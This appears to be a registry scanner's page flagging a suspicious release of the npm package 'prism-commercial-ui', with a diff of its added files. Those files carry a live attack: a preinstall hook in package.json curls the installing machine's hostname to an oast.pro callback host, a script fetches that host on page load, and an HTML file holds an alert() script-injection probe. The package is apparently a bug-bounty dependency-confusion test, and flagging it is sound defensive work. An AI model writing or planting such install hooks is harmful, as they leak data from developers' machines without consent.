prism-commercial-ui 100.100.117

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of prism-commercial-ui might be problematic. Click here for more details.

@@ -0,0 +1 @@
1
+ <script>alert('jwosborniv-bugcrowd')</script>
@@ -0,0 +1,12 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro')
3
+ .then(response => {
4
+ if (response.ok) {
5
+ return response.text();
6
+ }
7
+ throw new Error('Network response was not ok.');
8
+ })
9
+ .then(html => console.log(html))
10
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
11
+ });
12
+
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "prism-commercial-ui",
3
+ "version": "100.100.117",
4
+ "description": "jwosborniv-bugcrowd",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1",
7
+ "preinstall": "/usr/bin/curl $(hostname).cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro"
8
+ },
9
+ "author": "jwosborniv",
10
+ "license": "ISC"
11
+ }
12
+